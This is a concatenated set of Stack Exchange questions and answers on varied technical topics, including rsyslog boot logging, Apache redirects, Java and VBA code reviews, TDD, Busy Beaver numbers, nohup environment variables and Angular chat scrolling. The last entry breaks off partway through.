_unix.246076 | I configured rsyslog to send logs to a central logging server like this:*.* @@192.168.1.20$ActionExecOnlyWhenPreviousIsSuspended on& @@192.168.1.21& /var/log/failover$ActionExecOnlyWhenPreviousIsSuspended offIt works well, except when machine is booting. When the virtual machine starts and approximately twenty seconds after the machine starts, no messages are sent to 192.168.1.20 or 192.168.1.21. However, /var/log/failover contains all those lost messages.As a test, I started the machine and entered by hand:$ logger 1$ logger 2$ logger 3...The first central logging server contains just:Nov 28 13:57:40 demo arsene: 10The second logging server contains no messages from the demo machine.Finally, var/log/failover on demo machine contains:Nov 28 13:57:10 demo rsyslogd: [origin software=rsyslogd swVersion=7.4.4 x-pid=361 x-info=http://www.rsyslog.com] startNov 28 13:57:10 demo rsyslogd: rsyslogd's groupid changed to 104Nov 28 13:57:10 demo rsyslogd: rsyslogd's userid changed to 101... # more than a hundred usual messages from the kernelNov 28 13:57:20 demo kernel: [ 12.127981] random: nonblocking pool is initializedNov 28 13:57:21 demo arsene: 1Nov 28 13:57:22 demo arsene: 2Nov 28 13:57:23 demo arsene: 3Nov 28 13:57:25 demo arsene: 4Nov 28 13:57:27 demo arsene: 5Nov 28 13:57:28 demo arsene: 6Nov 28 13:57:30 demo arsene: 7Nov 28 13:57:32 demo arsene: 8Nov 28 13:57:37 demo arsene: 9I encounter this issue for both Ubuntu and Debian virtual machines.Additional notes:The network connectivity looks fine. If I try ping 192.168.1.20 and curl google.com during the period where the log messages are not sent to the log server, both ping and curl succeed.Disabling the firewall of the logging server has no effect.Running tcpdump shows that nothing is being sent to the log server during the twenty seconds period.Other Ubuntu machines on the network (which were deployed using a very different approach) report their logs to the logging server fine, including during the boot.By comparing the faulty machines to the correct ones, I noticed a version mismatch (7 vs. 8) for rsyslogd. Upgrading rsyslogd on faulty machines to version 8.14.0 haven't fixed the issue, but now I see the following message a bit after the log reporting starts working:Nov 29 02:18:39 demo rsyslogd-2359: action 'action 11' resumed (module 'builtin:omfwd') [v8.14.0 try http://www.rsyslog.com/e/2359 ]diff shows that /etc/rsyslog.conf and /etc/rsyslog.d/*.conf files are exactly the same between the new faulty machines and the old working ones.A apt-get update, apt-get upgrade and even apt-get dist-upgrade haven't fixed the problem. | Why is syslogd not reporting messages to remote server during and just after the boot? | rsyslog | As @ThomasDickey said, networking may not be completely started when userland programs start to run. Many enterprise ethernet switches don't accept packets for a number of seconds after an interface comes up, as they try to negotiate spanning tree settings.rsyslog has an actionresumeinterval setting that is 30 seconds by default. If you set it to a smaller value before any directives that use TCP connections, that will increase the retry rate, and the connections ought to get completed more quickly.There are also additional options you can set to ensure that early messages which are not sent immediately get delivered as soon as the connection is ready. For instance, you can use the options similar to:$ActionResumeInterval 5$ActionQueueType disk$WorkDirectory /var/spool/rsyslog$ActionQueueFilename actionRq$ActionQueueMaxDiskSpace 1m$ActionQueueSize 4000$ActionQueueTimeoutEnqueue 0$ActionResumeRetryCount -1 |
_webmaster.99608 | I have a .htaccess file that in its end I created some 301 redirects. For example:Redirect 301 /site-building-from-home /Redirect 301 /%D7%9E%D7%96%D7%99%D7%9F-%D7%AA%D7%9B%D7%A0%D7%99%D7%9D /For some reason all redirects with an English alias (say, site-building-from-home) works but all these with encoded aliases (Hebrew-to-machine-language) don't.Do we have an Apache-directives/PCRE expert that can explain this phenomena ?(Note: I used / instead a domain-name+TLD for flexibility considerations). | Encoded 301 redirects don't work, only english one does | htaccess;redirects | As it states in the Apache docs for a mod-alias Redirect:The old URL-path is a case-sensitive (%-decoded) path ...So, assuming /%D7%9E%D7%96%D7%99%D7%9F-%D7%AA%D7%9B%D7%A0%D7%99%D7%9D is the actual request as sent from the client, then you will need to match against the literal, percent-decoded (aka URL-decoded), text in the Redirect directive. From your example this would be:Redirect /- /(Make sure your .htaccess file is UTF-8 encoded.)If you want to match the percent-encoded URL, as sent from the client, then you will need to use mod_rewrite and match against THE_REQUEST server variable (which is not percent-decoded). For example:RewriteCond %{THE_REQUEST} ^[A-Z]{3,9}\ /%D7%9E%D7%96%D7%99%D7%9F-%D7%AA%D7%9B%D7%A0%D7%99%D7%9D\ HTTP/RewriteRule ^ / [R=301,L]You will need to enable the rewrite engine earlier in your code if not already ie. RewriteEngine On.However, if you change to using mod_rewrite redirects then it is strongly recommended to change your mod_alias Redirects to use mod_rewrite as well in order to avoid unexpected conflicts. |
_codereview.60670 | Find ceiling and floor in the BinarySearchTree. Looking for code-review, optmizations and best practices.public class FloorCeiling { private TreeNode root; public FloorCeiling(List<Integer> items) { create(items); } private void create (List<Integer> items) { if (items.isEmpty()) { throw new NullPointerException(The items array is empty.); } root = new TreeNode(items.get(0)); final Queue<TreeNode> queue = new LinkedList<TreeNode>(); queue.add(root); final int half = items.size() / 2; for (int i = 0; i < half; i++) { if (items.get(i) != null) { final TreeNode current = queue.poll(); final int left = 2 * i + 1; final int right = 2 * i + 2; if (items.get(left) != null) { current.left = new TreeNode(items.get(left)); queue.add(current.left); } if (right < items.size() && items.get(right) != null) { current.right = new TreeNode(items.get(right)); queue.add(current.right); } } } } private static class TreeNode { private TreeNode left; private int item; private TreeNode right; TreeNode(int item) { this.item = item; } } private static class IntegerObj { Integer obj = null; } public int ceiling (int val) { IntegerObj iobj = new IntegerObj(); recurseCeiling(root, iobj, val); return iobj.obj; } public int floor (int val) { IntegerObj iobj = new IntegerObj(); recurseFloor(root, iobj, val); return iobj.obj; } private void recurseCeiling (TreeNode node, IntegerObj iobj, int value) { if (node == null) { return; } if (value <= node.item) { iobj.obj = node.item; recurseCeiling(node.left, iobj, value); } else { recurseCeiling(node.right, iobj, value); } } private void recurseFloor (TreeNode node, IntegerObj iobj, int value) { if (node == null) { return; } if (value < node.item) { recurseFloor (node.left, iobj, value); } else { iobj.obj = node.item; recurseFloor (node.right, iobj, value); } }}public class FloorCeilingTest { @Test public void test1() { FloorCeiling fc1 = new FloorCeiling(Arrays.asList(100, 50, 150, 25, 75, 125, 175)); assertEquals(25, fc1.ceiling(20)); assertEquals(50, fc1.ceiling(30)); assertEquals(75, fc1.ceiling(70)); assertEquals(100, fc1.ceiling(90)); assertEquals(125, fc1.ceiling(120)); assertEquals(150, fc1.ceiling(145)); assertEquals(175, fc1.ceiling(160)); } @Test public void test2() { FloorCeiling fc2 = new FloorCeiling(Arrays.asList(100, 50, 150, 25, 75, 125, 175)); assertEquals(25, fc2.floor(27)); assertEquals(50, fc2.floor(55)); assertEquals(75, fc2.floor(78)); assertEquals(100, fc2.floor(110)); assertEquals(125, fc2.floor(128)); assertEquals(150, fc2.floor(160)); assertEquals(175, fc2.floor(180)); }} | Find floor and ceiling in the BST | java;tree | null |
_unix.340984 | It's nice to be able to fling the mouse up and right, not having to bother with precise targeting, and click. If your hand's already on the mouse, this is easier than switching back to the keyboard to press Alt+F4 for a quick window close.E.g. Windows (since at least 95) has made this work, although they at times had very annoying almost maximized window defaults that interfered with this quite a bit in some applications. Nonetheless, actual maximized windows have always capitalized on Fitz' Law in their design this way.Is there any way to get this behaviour in Linux Mint MATE 18.1? (Marco is the window manager, it seems.) As it is, maximized windows will not close with a click in the upper-right corner. One has to precisely back up a few pixels to activate the X and close it. | Getting Mint MATE (Marco?) to put the window-close X in the actual corner, not just near it | linux mint;window manager;mate | null |
_cs.65629 | Question: Are there any introductory texts in formal language or programming language theory which discuss how to apply it to the study of optimal notation?In particular, I am interested to learn what stack-languages, parse trees, and indices are, and how to predict when a certain type of notation will lead to exponential redundancy.I have basically no background in either formal language/grammar or programming theory, since as a math major the only computer science I learned was algorithms and graph theory, as well as very modest smidgens of complexity theory and Boolean functions. Thus, if the only books which discuss this are not introductory, I would be grateful for answers that both list such books discussing exponential notation blow-up as well as introductory books that will prepare for the books which directly address my question.Context: This question is inspired primarily by an answer on Physics.SE, which says that:It is very easy to prove (rigorously) that there is no parentheses notation which reproduces tensor index contractions, because parentheses are parsed by a stack-language (context free grammar in Chomsky's classification) while indices cannot be parsed this way, because they include general graphs. The parentheses generate parse trees, and you always have exponentially many maximal trees inside any graph, so there is exponential redundancy in the notation.Throughout the rest of the answer, other examples of exponential notation blow-up are discussed, for example with Petri Nets in computational biology.There are also other instances where mathematical notation is difficult to parse, for example as mentioned here when functions and functions applied to the argument are not distinguished clearly. This can become especially confusing when the function becomes the argument and the argument becomes the function, e.g. here. | Can formal languages be used to study mathematical notation? | formal languages;reference request;formal grammars;programming languages | Formal language theory does not concern itself with the semantics of the language. That might seem odd, since we tend to think of language as a mechanism for communicating something, but if you think about it, there are really two levels of understanding language (at least): the surface level, in which the language is a stream of lexemes, and the underlying denotational level which is more or less divorced from the surface representation. (Chomsky posited an intermediate transformational level to get around some limitations with CFGs but that's not relevant here.) Consequently, it is possible to say the same thing in different languages; Chomsky is not a Whorfian. (See Wikipedia for a brief overview, with some references).Nonetheless, a context-free grammar is not sufficient to distinguish correct and incorrect utterances. Chomsky offered the classic example: Colourless ideas sleep furiously (which he spelled incorrectly, being a USian). See Wikipedia, again. (Unfortunately Wikipedia doesn't have a Canadian English version.) The precise division between syntactic and semantic errors is hard, if not impossible, to demarcate and there has been considerable debate over this topic in CS fields, which I'm not going to even attempt to discuss here because I always get into trouble when I do. However, we can identify one classic grammatical rule present in many human languages: noun/verb agreement. I disagrees seems to me to be a syntactic error in the sense that I understand the intent of the utterance perfectly but also recognize it as erroneous. But this syntactic issue can only be captured by a context-free grammar if we enumerate all possible agreements. That is, we can write something vaguely like $S \to NP_{sing} VP_{sing} | NP_{plural} VP_{plural}$, but it is easy to see how the enumeration could get out of hand in language with more complicated agreement rules (gender, for example).The problem with context-free grammars is that they are context-free, although you shouldn't take that description too seriously because it is easy to fall into the trap of misinterpreting technical use of common words (which, I might argue, is the basis of this question in the first place). That means that a nonterminal (like $NP$ above) must derive exactly the same set of phrases regardless of the context in which it appears. So we could not write, for example, $S \to NP_X VP_X$ with the understanding that $X$ needs to be filled in the same way in both expansions. (This is one of the issues which which transformational grammar attempted to grapple.)That is exactly the problem with tensor index contractions. A tensor index contraction places a particular requirement on the use of index variables: an index variable must be used exactly twice, in which case it cannot be on the left-hand side, or exactly once, in which it must be on the left-hand side. (Since I'm not a physicist, I'd be tempted to collapse that into saying that an index variable must appear exactly twice in all. But there is a semantic distinction between free and placeholder variables, which is important to the understanding of the expression.) Here, there is no simple finite collection of index variables and no limit to the number of placeholders used. Moreover, renaming placeholders does not affect semantics provided that the new names are not used elsewhere in the expression, and one might expect the formal language description to capture that fact.It is in fact possible to rigorously prove the assertion that context-free grammars cannot capture contextual agreement, as in the previous examples. I think that has something to do with what the quoted claim is asserting. Depending on how omnicurious you are, you might find it interesting to learn more, but I don't think it will end up being particularly relevant to the philosophical or physical insights you seem to be seeking.The other linked articles, about unfortunate surface forms in mathematical notation, are simply anecdotal; none of them, as far as I can see, makes any deep or even superficial point relevant to formal language theory, just as the possibly famous joke that one man's fish is another man's poisson is not even vaguely insightful about romance linguistics, but it's still funny (IMO). |
_softwareengineering.86099 | I have been designing and developing code with TDD style for a long time. What disturbs me about TDD is writing tests for code that does not contain any business logic or interesting behaviour. I know TDD is a design activity more than testing but sometimes I feel it's useless to write tests in these scenarios.For example I have a simple scenario like When user clicks check button, it should check file's validity. For this scenario I usually start writing tests for presenter/controller class like the one below.@Testpublic void when_user_clicks_check_it_should_check_selected_file_validity(){ MediaService service =mock(MediaService); View view =mock(View); when(view.getSelectedFile).thenReturns(c:\\Dir\\file.avi); MediaController controller =new MediaController(service,view); controller.check(); verify(service).check(c:\\Dir\\file.avi);}As you can see there is no design decision or interesting code to verify behaviour. I am testing values from view passed to MediaService. I usually write but don't like these kind of tests. What do yo do about these situations ? Do you write tests for all the time ?UPDATE :I have changed the test name and code after complaints. Some users said that you should write tests for the trivial cases like this so in the future someone might add interesting behaviour. But what about Code for today, design for tomorrow. ? If someone, including myself, adds more interesting code in the future the test can be created for it then. Why should I do it now for the trivial cases ? | Do you write unit tests for all the time in TDD? | unit testing;language agnostic;tdd | I don't aim for 100 % of code coverage. And I usually don't write tests of methods which will obviously not contain any business logic and/or more than a few lines of code. But I still write unit tests (using TDD) of methods which not seem that complex. This is mostly because I like to have the unit test already, when coming back to that code months or even years later, and want to make it more complex. It's always easier to extend existing tests, than having to build it all from scratch. As Noufal said, it's subjective. My advice is to write the tests, if you think the method is a bit complex or have the potential to get more complex. |
_webapps.44166 | We use Trello as a kanban board to manage the work of multiple customer projects within our scrum team. I would like to be able to give each customer access to the board, but they should only be allowed to see the cards for their projects. How can I do this? | Configure Trello to share subset of cards on a board to certain users | trello;trello organization;trello cards | null |
_softwareengineering.55679 | I am a true believer in Model Driven Development, I think it has the possibility to increase productivity, quality and predictability. When looking at MetaEdit the results are amazing. Mendix in the Netherlands is growing very very fast and has great results. I also know there are a lot of problemsversioning of generators, templates and frameworkprojects that just aren't right for model driven development (not enough repetition)higher risks (when the first project fails, you have less results than you would have with more traditional development)etcBut still these problems seem solvable and the benefits should outweigh the effort needed. Question: What do you see as the biggest problems that make you not even consider model driven development ?I want to use these answers not just for my own understanding but also as a possible source for a series of internal articles I plan to write. | Why aren't we all doing model driven development yet? | development methodologies;mdd | There is no golden hammer. What works well in one domain is pretty useless in another. There is some inherent complexity in software development, and no magic tool will remove it.One might also argue that the generation of code is only useful if the language itself (or the framework) is not high-level enough to allow for powerful abstractions that would make MDD relatively pointless. |
_webapps.80595 | I have two contacts that changed their emails. In order to have the correct email address auto pop, I deleted the first contact, but before deleting the second, I wondered if, once deleted, does that delete all previous emails from that contact? | Does deleting an email contact delete the previous emails from that contact? | gmail | null |
_codereview.127891 | If I have an array of numbers like this:1 3 4 6 71 22 4 5 95 71 2 3 5 Is there a quick way to take all of the unique numbers and arrange them into a single column, like this?12345679The approach I have works, but takes a very long time for large matrix:Sub Test1Call RecordArrangeCall RemoveDuplicates2End SubPrivate Sub RecordArrange()Worksheets(List).ActivateDim Rng As RangeDim i As Longi = 1Application.ScreenUpdating = FalseApplication.EnableEvents = FalseApplication.Calculation = xlManualApplication.DisplayStatusBar = FalseApplication.EnableEvents = FalseDim lastRow As LonglastRow = Range(A1).End(xlDown).rowWhile i <= lastRowSet Rng = Range(A & i)If IsEmpty(Rng.Offset(0, 1).Value) = False ThenRng.Offset(0, 1).CopyRng.Offset(1, 0).Insert Shift:=xlDownRng.Offset(0, 1).Delete Shift:=xlToLeftElse: i = i + 1End IfWendColumns(A:A).Select ActiveWorkbook.Worksheets(List).Sort.SortFields.Clear ActiveWorkbook.Worksheets(List).Sort.SortFields.Add Key:=Range(A1), _ SortOn:=xlSortOnValues, Order:=xlAscending, DataOption:=xlSortNormal With ActiveWorkbook.Worksheets(List).Sort .SetRange Range(A1:A8000) .Header = xlNo .MatchCase = False .Orientation = xlTopToBottom .SortMethod = xlPinYin .Apply End With Application.EnableEvents = TrueApplication.Calculation = xlAutomaticApplication.DisplayStatusBar = TrueApplication.EnableEvents = TrueEnd SubPrivate Sub RemoveDuplicates2()Dim Rng As RangeDim i As Longi = 1Application.ScreenUpdating = FalseApplication.EnableEvents = FalseApplication.Calculation = xlManualApplication.DisplayStatusBar = FalseApplication.EnableEvents = FalseDim lastRow As LonglastRow = Range(A1).End(xlDown).rowWhile i <= lastRowSet Rng = Range(A & i)If Rng = Rng.Offset(1, 0) And IsEmpty(Rng.Value) = False ThenRng.Delete Shift:=xlUpElseIf Rng <> Rng.Offset(1, 0) And IsEmpty(Rng.Value) = False Theni = i + 1ElseIf Application.WorksheetFunction.CountA(Rng) = 0 Theni = i + 1Else: i = i + 1End IfWend Application.EnableEvents = TrueApplication.Calculation = xlAutomaticApplication.DisplayStatusBar = TrueApplication.EnableEvents = TrueEnd SubThis does work, but it seems like a very roundabout approach. Is there a better way? | Re-arranging an matrix of numbers to a numeric list | vba;excel | If you want a list of unique members of a matrix (or 2 dimensional array), one good option is to use a dictionary (vba's hashtable/hashmap). Since vba is lacking a 'set' data structure, a dictionary will do the job just fine.if you have a 2 dimensional array (or matrix), you can just do a for each on that array.For Each member in matrix someDictionary(member) = TrueNextI am setting the value of the dictionary to True but I could just as well set it to anything (we don't care about the value in this case). What we do care about is the key. After doing this, you will have filled the dictionary with just the unique list of items in the matrix.After this loop you can just call someDictionary.Keys to get an array of the unique items. You can then sort that array however you like.*note that to use Dictionaries you will have to add a Reference to the Scripting library.--so for example:Private Sub RemoveDuplicates2() Dim Rng As Variant: Rng = ActiveSheet.UsedRange Dim cell as Variant Dim output as New Dictionary For Each cell in Rng output(cell) = True Next Dim uniques as Variant: uniques = output.Keys ' Do something with your array of uniques here ' perhaps drop to the worksheet like this ActiveSheet.Range(Cells(1,1), Cells(1,UBound(uniques)+1)) = uniquesEnd Sub |
_webmaster.101621 | I'm using Google Tag Manager to add Google Analytics.As the title suggests, do I need to Enable Enhanced Ecommerce Features for all pages, or should I create a tag that is triggered on actual ecommerce pages and enable it there. | Does the Enhanced Ecommerce data layer need to be sent on non-ecommerce pages | google analytics;google tag manager | No, the EE dataLayer does not need to be on all pages. Assuming your page view tag is enabled to track EE data via the dataLayer, it will only track whatever you push to it, so no EE data pushed means no EE data in GA. |
_codereview.91203 | My friend and I are working on a bare-bones chat web app, using Angular on the front end. He's using Swampdragon for some of the real-time stuff.My task that I set out to achieve was to get the chat window to scroll to the bottom when a chat room is loaded (most relevant bit is $dragon.onChannelMessage):app.controller('ChatRoomCtrl', ['$scope', '$dragon', 'ChatStatus', 'Users', function ( $scope, $dragon, ChatStatus, Users) { $scope.channel = 'messages'; $scope.ChatStatus = ChatStatus; $scope.idToUser = function(id) { var user; user = $scope.users.filter(function(obj) { return obj.pk == id; }); return user[0].display_name; }; Users.getList().then(function(users) { $scope.users = users; }); $dragon.onReady(function() { $dragon.subscribe('messages', $scope.channel).then(function(response) { $scope.dataMapper = new DataMapper(response.data); }); }); $dragon.onChannelMessage(function(channels, message) { if (indexOf.call(channels, $scope.channel) > -1) { if (ChatStatus.messages[message.data.room].indexOf(message.data) == -1) { message.data.posted = new Date(message.data.posted); $scope.$apply(function() { ChatStatus.messages[message.data.room].push(message.data); setTimeout(function() { scrollToBottom(); }, 30); }); } } });}]);Or, when a new message is pushed:app.controller('RoomCtrl', ['$scope', 'Rooms', 'Messages', 'ChatStatus', function($scope, Rooms, Messages, ChatStatus) { $scope.changeRoom = function(room) { ChatStatus.selectedRoom = room; Messages.getList({'room': room.id}).then(function(messages) { angular.forEach(messages, function(message, key) { message.posted = new Date(message.posted); }); ChatStatus.messages[room.id] = messages; setTimeout(function() { scrollToBottom(); }, 30); }); } $scope.rooms = Rooms.getList() .then(function(rooms) { ChatStatus.rooms = rooms; ChatStatus.selectedRoom = rooms[0]; $scope.rooms = rooms; })}]);In both controllers, I refer to the scrollToBottom function:function scrollToBottom() { var chatWindow = document.querySelector('.the-chats'); var mostRecent = chatWindow.querySelector('li:last-child'); var mostRecentDimensions = mostRecent.getBoundingClientRect(); var chatWindowScrollY = chatWindow.scrollTop; chatWindow.scrollTop = mostRecentDimensions.bottom + chatWindowScrollY;}If I remove the setTimeout from the first controller, it'll scroll to what is the last item in the list before the new message is pushed, while the second controller will error out.If the setTimeout is in place, this does what I want it to do. However, it feels like a bad solution; it certainly doesn't feel like an 'Angular' way.I've read a bit about promises, deferred objects, $q, etc., but the examples always seem to use it in the context of AJAX-types of calls, so I don't know if that applies here. But that's really what I'm looking for, right? Push the new message, then do the scroll? | Using setTimeout to get scrolling chat window to work, but doesn't feel like the ideal solution | javascript;angular.js;chat | null |
_unix.158329 | Unable to launch Firefox in CentOS 6. Installed package using yum install firefox.It repeatedly shows this error,XPCOMGlueLoad error for file /usr/lib/firefox/libxul.so:libvpx.so.1: cannot open shared object file: No such file or directoryCouldn't load XPCOM.How to rectify this error? | Unable to launch Firefox: keeps on crashing | libraries;firefox | null |
_vi.4817 | Is there a way to run vim from command line to edit the last edited file?Let say I first edit file giorgio.sh:$ vi giorgio.shAfterwards, I exit back to terminal$ do something...$ do something else...$ do something else again...Is there a way to edit again the file in vim, maybe using some vim command line parameter/option ?$ vi {option to edit last edited/saved file}I mean without using:an internal vim command like :browse oldfilesthe beautiful MRU pluginthe bash history (requiring to scroll, if, after your edit, you ran some other commands)It is strange that it doesn't seem possible to do a so common task in a super quick Vim way. | Is there a vim command line option to edit last edited file? | invocation;options | An heavy solution: the sessionsAnother possible option is to use the sessions mechanism:First your vim version has to be compiled with the +mksession option. (Use :echo has('mksession') to check that).Now when you are about to leave vim, use the following command::mksession!This will create (or overwrite thanks to !) a file named Session.vim in the current directory which will save your current open files, windows layout and cursor position.Note that you can also give a path as parameter to mksession to choose where to save and how to name you session file.Then you can go back to your shell and do whatever you want. When you want to reopen vim with your last edited file you have to use:$vim -S /path/to/Session.vimThis will reopen the files you where editing with the cursor at the same positionHow to shorten it? If this workflow is good for you you'll probably be able to create the bash alias the most convenient for your use case. Here is an example, maybe you'll want to bend it to your way to use sessions: You can add this to your .vimrc:command! Q mksession! ~/Session.vim | qallthis will allow you to use :Q to save your session in ~/Session.vim and quit vim.As a bash alias you can create :alias lvim='vim -S ~/Session.vim'which will reload the session created when you used :Q in vim.A much lighter solution: suspend vimThis solution is not suitable if you need to close your shell.In unix shell you can suspend Vim using Ctrl+z. This will put Vim in background and you'll get acces to your shell again.In your shell when you need to get Vim back you simply have to use the command:$ fg Note That zsh provides convenient mappings to use also Ctrl+z on the shell to get Vim back.Note2 If you tend to forget that you put vim in back ground you can add these lines to your .bashrc:PROMPT_COMMAND='hasjobs=$(jobs -p)'PS1=$PS1 + '${hasjobs:+\j }'When you don't have any background job your prompt will stay the same and when you have some background jobs, a count will appear at the end of your prompt (It's up to you to bend it to your preferences). For this trick, credits goes to jw013 |
_unix.231282 | So, how can I limit the log file size or how to automate to delete the files, if the files are reached a particular size. Here is the actual scenario PLEASE CHECK HERE. For testing, I deleted log file /root/folder/my_output_file.log, while script is running, but after deletion the log file was not regenerated. Or I have do any modifications to script to log the output properly.Thanks | How to limit the size of log files which are generated by scripts runs at startup | shell script;logs | I found some useful code(Even, it is not efficient way to handle the logs files)#!/bin/bash MaxFileSize=10000000#Max file size 10MBwhile truedo python /root/rtt/rtt.py >> /root/script_logs/rtt.log sleep 60 com=`du -b /root/script_logs/rtt.log` file_size=`echo $com | cut -d' ' -f1` if [[ $file_size -gt $MaxFileSize ]] then echo ' ' > /root/script_logs/rtt.log fidone |
_unix.283837 | I have a simple python file which plays a sound:#sound_test.pyimport pygame#init soundspygame.mixer.pre_init(44100, 16, 2, 4096)pygame.init()pygame.mixer.init()WAV = pygame.mixer.Sound(Music/4AM_cry.wav)WAV.play()EDIT: I've found that if I run alsamixer it shows the correct audio out but sudo alsamixer does not.If I run python3 soundtest.py it works but sudo python3 soundtest.py does not. What's going on?P.S. I have a USB DAC I'm using on a RPi. It is set to the default audio card. | Default audio (Pygame.mixer and alsamixer) doesn't work when using sudo | sudo | null |
_cs.66486 | Background: I am a complete layman in computer science.I was reading about Busy Beaver numbers here, and I found the following passage:Humanity may never know the value of BB(6) for certain, let alone that of BB(7) or any higher number in the sequence.Indeed, already the top five and six-rule contenders elude us: we cant explain how they work in human terms. If creativity imbues their design, its not because humans put it there. One way to understand this is that even small Turing machines can encode profound mathematical problems. Take Goldbachs conjecture, that every even number 4 or higher is a sum of two prime numbers: 10=7+3, 18=13+5. The conjecture has resisted proof since 1742. Yet we could design a Turing machine with, oh, lets say 100 rules, that tests each even number to see whether its a sum of two primes, and halts when and if it finds a counterexample to the conjecture. Then knowing BB(100), we could in principle run this machine for BB(100) steps, decide whether it halts, and thereby resolve Goldbachs conjecture. Aaronson, Scott. Who Can Name the Bigger Number? Who Can Name the Bigger Number? N.p., n.d. Web. 25 Nov. 2016.It seems to me like the author is suggesting that we can prove or disprove the Goldbach Conjecture, a statement about infinitely many numbers, in a finite number of calculations. Am I missing somehing? | Goldbach Conjecture and Busy Beaver numbers? | turing machines;number theory;busy beaver | null |
_unix.308370 | (I'm editing an existing Bash script, so I'm probably making a silly mistake here...)I have a shell script that saves a command with an environment variable as its argument like this:COMMAND=mvn clean install -P $MAVEN_PROFILEIt then executes the command with nohup roughly as follows:nohup $COMMAND > logfileThis works.Now, I want to set an environment variable that can be accessed in Maven. I've tried several things like the following:COMMAND=FORMAVEN=valueForMaven mvn clean install -P $MAVEN_PROFILE...but then it just terminates with:nohup: failed to run command `FORMAVEN=valueForMaven': No such file or directoryI feel like there are several unrelated concepts at work here, none of which I understand or even know about. What do I need to be able to do the above? | How can I set environment variables for a program executed using `nohup`? | bash;shell script;environment variables;nohup;subshell | Three methods:set (and export) the variable before launching mvnset the variable on the nohup launch:FORMAVEN=valueForMaven nohup $COMMAND > logfileuse env to set the variableCOMMAND=env FORMAVEN=valueForMaven mvn clean install -P $MAVEN_PROFILE |
_scicomp.2441 | I am implementing a machine learning algorithm for which I need to solve an integer linear program. To get the solution in polynomial time, the authors of the algorithm have dropped the integral constraints and instead solve the corresponding linear program.I am not too aware of the theory of optimization, so using the Mosek optimization tool-kit as a black-box to solve the LP. Now obviously I have to add back the integral constraints once the solution of LP is obtained. Any ideas how to go about it? I am sure Mosek and other popular LP solvers would have an option for the same but can't seem to find it in their documentation or elsewhere.Thanks. | How to add back integral constraints to linear program solution | optimization;linear programming | A lot of linear programming (LP) software packages will also solve mixed-integer linear programs (MILPs) with varying degrees of effectiveness.One way to add back the integral constraints is to warm-start an MILP solver with the solution from the LP relaxation of the integer linear program (ILP) that the authors of the machine learning algorithm use. However, Ali is right that it would be more efficient to solve the original ILP. Certain algorithms (such as branch-and-bound) will solve the LP relaxation in the process of computing an optimal solution.Furthermore, any MILP solver worth using will implement MILP solution algorithms, such as branch-and-bound and branch-and-cut, with much more sophisticated algorithmic heuristics and variants than most people could code themselves. Even in problems with special structure, researchers often modify and tweak existing solvers rather than write their own.If you're at a university, I highly suggest using CPLEX or Gurobi, both of which are top-of-the-line MILP solvers that have free academic licenses. In some cases, these solvers will solve MILP instances significantly faster than their competition. That said, if your problem is small enough, speed may not really matter. |
_webapps.84667 | I created a one page flow-chart with draw.io and printed it. After opening it again to create a new version, it opened to what I thought was a blank page. There was now page after page of blank canvas, with the project in the lower right corner.I tried to go to Document Properties Custom but that didn't remove the blank pages. There is no obvious way to remove them. The structure chart content is neatly within the one page, so I don't see why it would automatically add more. The main problem is that I can't print or save because the file is so large my laptop freezes or otherwise stalls when trying to print or save as a pdf.How can I remove these blank pages? | How to remove blank canvas pages from draw.io | draw.io | null |
_softwareengineering.90859 | We are currently usign a roll-forward approach to DB changes, akin to Migrations, where each developer creates and checks in a script that promotes the latest version of the DB to a new state. Problems arise when multiple developers concurrently work on non-trivial tasks and end up making changes to the DB that interfere with each other. The 'non-trivial' bit is significant because if the tasks take long enough, and if DB changes occurr early enough in the cycle, neither dev ends up being aware of the other's changes, and we end up with either a DB merge nightmare (preferred case) or an inadvertently broken database.Can these situations be easily avoided? Are there database refactoring strategies that effectively handle the scenario of multiple developers actively changing the schema?If it matters, we use SQL Server. | How best to handle database refactoring within a team? | database;refactoring;sql server | null |
_scicomp.7001 | I am trying to solve some unconstrained nonlinear optimzation problems on GPU(CUDA).The objective function is a smooth nonlinear function, and its gradient is relatively cheap to compute analytically, so I dont need to bother with numerical approximation.I want to solve this problem with mostly fp32 maths ops (for various reasons), so which nonlinear optimization method is more robust against round-up errors whilst has good performance? (e.g. conjugate gradient/quasi newton/trust region), have anyone tried BFGS on GPU with good results?btw, the Hessian, if needed, is relatively small in my case (<64x64 typically), but I need to solve thousands of these small scale optimzation problems concurrently. | Solving unconstrained nonlinear optimization problems on GPU | optimization;cuda | null |
_codereview.91402 | Our school grading scale is from 1..10 with one decimal. If you do nothing you still get a grade of 1.0. A passing grade equals 5.5. A 'cesuur' percentage defines at what percentage of correct answers the 5.5 will be given to a student.Examples:List itemGrade(0,100,x) should always result in 1.0Grade(100,100,x) should always results in 10.0Grade(50,100,0.5) should result in 5.5Questions: how can I simplify the code? How can I make it more robust?Public Function Grade(Points As Integer, MaxPoints As Integer, Cesuur As Double) As Double Dim passPoints As Integer Dim maxGrade As Integer Dim minGrade As Integer Dim passGrade As Double Dim base As Double Dim restPoints As Integer Dim restPass As Double passPoints = Cesuur * MaxPoints maxGrade = 10 minGrade = 1 passGrade = (maxGrade + minGrade) / 2 base = maxGrade - passGrade If Points < passPoints Then Grade = 1 + (passGrade - minGrade) * Points / passPoints Else restPoints = MaxPoints - Points restPass = MaxPoints * (1 - Cesuur) Grade = maxGrade - restPoints * base / restPass End If Grade = Round(Grade, 1)End Function | Calculate grades based on pass/fail percentage | vba | The function's parameters are implicitly passed by reference, which probably isn't the intent since none of the parameters are assigned/returned to the caller.Signature should pass its parameters by value, like this:Public Function Grade(ByVal Points As Integer, ByVal MaxByVal As Integer, ByVal Cesuur As Double) As DoublemaxGrade and minGrade are only ever assigned once - they're essentially constants and could be declared as such:Const MAXGRADE As Integer = 10Const MINGRADE As Integer = 1I would suggest to declare variables closer to their usage, and perhaps only assign the function's return value in one place.Variables restPoints and restPass are only ever used with a passing grade, in that Else block. VBA doesn't scope variables at anything tighter than procedure scope, so you could extract a method to calculate a passing grade, but that's borderline overkill - here's what it would look like, with parameter casing to camelCase:Option ExplicitPrivate Const MAXGRADE As Integer = 10Private Const MINGRADE As Integer = 1Public Function Grade(ByVal points As Integer, ByVal maxPoints As Integer, ByVal cesuur As Double) As Double Dim passPoints As Integer passPoints = cesuur * maxPoints Dim passGrade As Double passGrade = (MAXGRADE + MINGRADE) / 2 Dim base As Double base = MAXGRADE - passGrade Dim result As Double If points < passPoints Then result = 1 + (passGrade - MINGRADE) * points / passPoints Else result = CalculatePassingGrade(MAXGRADE, base, points, maxPoints, cesuur) End If Grade = Round(result, 1)End FunctionPrivate Function CalculatePassingGrade(ByVal base As Double, ByVal points As Integer, 